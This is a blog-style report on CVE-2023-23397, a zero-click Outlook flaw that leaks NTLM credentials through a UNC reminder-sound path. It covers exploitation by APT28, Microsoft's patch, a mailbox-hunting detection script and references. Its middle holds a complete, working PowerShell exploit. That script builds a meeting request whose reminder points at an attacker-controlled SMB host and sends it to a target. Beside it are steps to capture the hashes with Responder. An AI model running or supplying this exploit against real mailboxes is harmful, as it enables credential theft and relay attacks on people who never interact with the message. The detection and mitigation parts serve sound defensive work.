CVE-2023–23397 Report

m0lt3n
Mar 28, 2023


“CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server on an untrusted network. No user interaction is required. The connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication” (MSRC).

In simple terms, this vulnerability affects Microsoft Outlook for Windows, the desktop email client, and is classified as an elevation of privilege. A remote attacker sends the target a message, typically a calendar appointment or task with a reminder, whose extended MAPI property for the custom reminder sound (PidLidReminderFileParameter) holds a UNC path such as \\attacker-host\share\sound.wav. When the target’s Outlook processes the reminder it opens that path automatically, which makes the client authenticate to the attacker’s SMB server with NTLM. The attacker captures the user’s Net-NTLMv2 response and can relay it in real time to other systems that accept NTLM authentication, or attempt to crack it offline to recover the password. The user never has to open the message or click anything. This can lead to the compromise of other systems on the network. Microsoft fixed the issue in a security update for Microsoft Outlook for Windows; install it on every Outlook for Windows client to stay protected.

Why It’s So Dangerous:
The malicious message requires no user interaction. The attacker sets the reminder so that it is already due when the item arrives, so the exploit fires as soon as the target’s running Outlook client processes the reminder, with the message merely sitting in the inbox or calendar. The loss of financial data, sensitive customer information, employee data, and more are realistic and potentially devastating consequences of such an attack, because the stolen NTLM credential can be relayed to file servers, Exchange, and other NTLM-accepting systems.

Threat Actors:
APT28 (a.k.a. STRONTIUM, Sednit, Sofacy, and Fancy Bear), which has been linked to Russia’s military intelligence service, the GRU, was observed exploiting CVE-2023-23397 between April and December 2022, almost a year before the patch was released.

The steps below follow the public proof-of-concept script (ka7ana, referenced below) that demonstrates how this vulnerability is exploited:

Steps:
Paste the script into PowerShell on a machine with Outlook installed, set the destination (target) email address and the attacker-controlled host that the UNC path should point at, and run it. The script creates an appointment whose reminder sound property points at the attacker’s SMB share and sends it to the target.

Start Responder on the attacker host before sending. Responder is a Python tool that harvests credentials in Windows networks through Man-in-the-Middle (MitM) techniques: it poisons LLMNR/NBT-NS/mDNS name resolution and runs rogue authentication servers (SMB, HTTP, and others). Here its SMB listener on TCP 445 receives the NTLM authentication from the target’s Outlook and records the Net-NTLMv2 hash.
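The following is an added example that reproduces the procedure above in PowerShell; it is not the page’s own script and not ka7ana’s PoC copied verbatim. It assumes Outlook for Windows is installed and signed in on the sending host, that `$Target` and `$ListenerHost` are placeholders you replace, and that a capture or relay listener such as Responder is already answering SMB on `$ListenerHost`. The property tags are the documented MAPI identifiers for the reminder override flag and the reminder sound path.

```powershell
# Added example (not the page's or ka7ana's script): build the CVE-2023-23397
# trigger item with the Outlook COM object and send it to the target.
# Assumptions: Outlook for Windows is installed and signed in here; $Target and
# $ListenerHost are placeholders; an SMB listener (e.g. Responder) is already
# running on $ListenerHost, TCP 445.
param(
    [string]$Target       = "target@example.com",    # assumption: recipient mailbox
    [string]$ListenerHost = "listener.example.test"  # assumption: attacker-controlled host
)

# MAPI named-property tags for the PropertyAccessor (MS-OXPROPS):
#   property set PSETID_Common = {00062008-0000-0000-C000-000000000046}
#   PidLidReminderOverride      = LID 0x851C, type PT_BOOLEAN (000B)
#   PidLidReminderFileParameter = LID 0x851F, type PT_UNICODE (001F)
$PidLidReminderOverride      = "http://schemas.microsoft.com/mapi/id/{00062008-0000-0000-C000-000000000046}/851C000B"
$PidLidReminderFileParameter = "http://schemas.microsoft.com/mapi/id/{00062008-0000-0000-C000-000000000046}/851F001F"

$outlook = New-Object -ComObject Outlook.Application
$item    = $outlook.CreateItem(1)        # 1 = olAppointmentItem

$start = (Get-Date).AddMinutes(1)
$item.Subject  = "Project sync"
$item.Location = "Room 1"
$item.Start    = $start
$item.End      = $start.AddMinutes(30)

# Reminder 15 minutes before a start that is 1 minute away: the reminder is
# already due, so the target's Outlook processes it as soon as the item lands.
$item.ReminderSet               = $true
$item.ReminderMinutesBeforeStart = 15

# Send it as a meeting request so it is placed in the target's calendar.
$item.MeetingStatus = 1                  # 1 = olMeeting
$item.Recipients.Add($Target) | Out-Null

# Override the default reminder sound and point the sound file at a UNC path
# on the listener. Resolving that path makes Outlook authenticate over SMB
# with NTLM, which is what the listener captures or relays.
$item.PropertyAccessor.SetProperty($PidLidReminderOverride, $true)
$item.PropertyAccessor.SetProperty($PidLidReminderFileParameter, "\\$ListenerHost\reminder\alert.wav")

$item.Send()
Write-Host "Sent to $Target; reminder path points at \\$ListenerHost\reminder\alert.wav"
```

Run this only against mailboxes you are authorised to test. On a patched client nothing is captured, because Outlook now ignores the reminder path unless it resolves to a local, intranet, or trusted zone.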

Alert Pop-Up: (screenshot of the reminder alert shown on the target’s Outlook; image not reproduced here)

Hashes: (screenshot of the NTLM hashes captured by Responder; image not reproduced here)
Mitigation:
“To address this vulnerability, you must install the Outlook security update, regardless of where your mail is hosted (e.g., Exchange Online, Exchange Server, some other platform) or your organization’s support for NTLM authentication. The Outlook update addresses the vulnerability by only using the path to play a sound when from a local, intranet or trusted network source” (MSRC).
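As an added example of checking a mailbox for the trigger property (this is not the page’s own script, not Microsoft’s published detection script, and not the PoC), the following PowerShell walks a signed-in Outlook profile’s Inbox, Calendar, and Tasks folders and reports any item whose reminder sound path is a UNC path to a host that is neither the local machine nor a single-label intranet name. The trust test in `Test-UntrustedReminderPath` is a simplified stand-in for the URL security-zone check the Outlook patch performs, not its exact logic; it is an assumption for illustration.

```powershell
# Added example (not the page's, Microsoft's, or ka7ana's script): hunt a
# signed-in Outlook profile for items carrying the CVE-2023-23397 trigger.
# Assumptions: Outlook for Windows with a loaded profile; the trust test below
# approximates the patch's local/intranet/trusted-zone check rather than
# consulting the user's actual security-zone settings.

# PidLidReminderFileParameter (PSETID_Common, LID 0x851F, PT_UNICODE) holds
# the custom reminder sound path that the malicious message sets.
$PidLidReminderFileParameter = "http://schemas.microsoft.com/mapi/id/{00062008-0000-0000-C000-000000000046}/851F001F"

function Test-UntrustedReminderPath {
    param([string]$Path)
    # Only a UNC path (\\host\share\...) makes Outlook open an SMB connection;
    # an empty value or a local drive path is harmless.
    if ($Path -notmatch '^\\\\([^\\]+)\\') { return $false }
    $targetHost = $Matches[1]
    # Local machine: loopback or this computer's own name.
    if ($targetHost -in @('localhost', '127.0.0.1', $env:COMPUTERNAME)) { return $false }
    # A single-label name maps to the intranet zone by default; anything with a
    # dot (an FQDN or IPv4 literal) can point off-network, so report it.
    if ($targetHost -notmatch '\.') { return $false }
    return $true
}

$outlook   = New-Object -ComObject Outlook.Application
$ns        = $outlook.GetNamespace("MAPI")
$folderIds = @{ Inbox = 6; Calendar = 9; Tasks = 13 }   # olFolderInbox, olFolderCalendar, olFolderTasks

$findings = foreach ($name in $folderIds.Keys) {
    $folder = $ns.GetDefaultFolder($folderIds[$name])
    foreach ($item in $folder.Items) {
        try {
            $path = $item.PropertyAccessor.GetProperty($PidLidReminderFileParameter)
        } catch {
            continue   # property not set on this item: nothing to check
        }
        if (Test-UntrustedReminderPath $path) {
            [PSCustomObject]@{
                Folder  = $name
                Subject = $item.Subject
                Created = $item.CreationTime
                Path    = $path
            }
        }
    }
}

$findings | Format-Table -AutoSize
```

Any hit is worth treating as an attempted credential theft: the item was crafted, since Outlook’s UI never sets a UNC reminder sound on its own. Microsoft also published a PowerShell script that performs the equivalent check server-side against Exchange Online and Exchange Server mailboxes, which covers users who have not yet opened Outlook. Either way, the check does not replace the patch; it only tells you whether someone tried.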

References

Microsoft Security Response Center. (2023, March 14). Microsoft mitigates Outlook elevation of privilege vulnerability. MSRC Blog. Retrieved March 24, 2023, from https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/

MDSec. (2023, March 15). Exploiting CVE-2023-23397: Microsoft Outlook elevation of privilege vulnerability. Retrieved March 24, 2023, from https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

ka7ana. (2023, March 16). CVE-2023-23397.ps1 [PowerShell script]. GitHub. Retrieved March 24, 2023, from https://github.com/ka7ana/CVE-2023-23397/blob/main/CVE-2023-23397.ps1
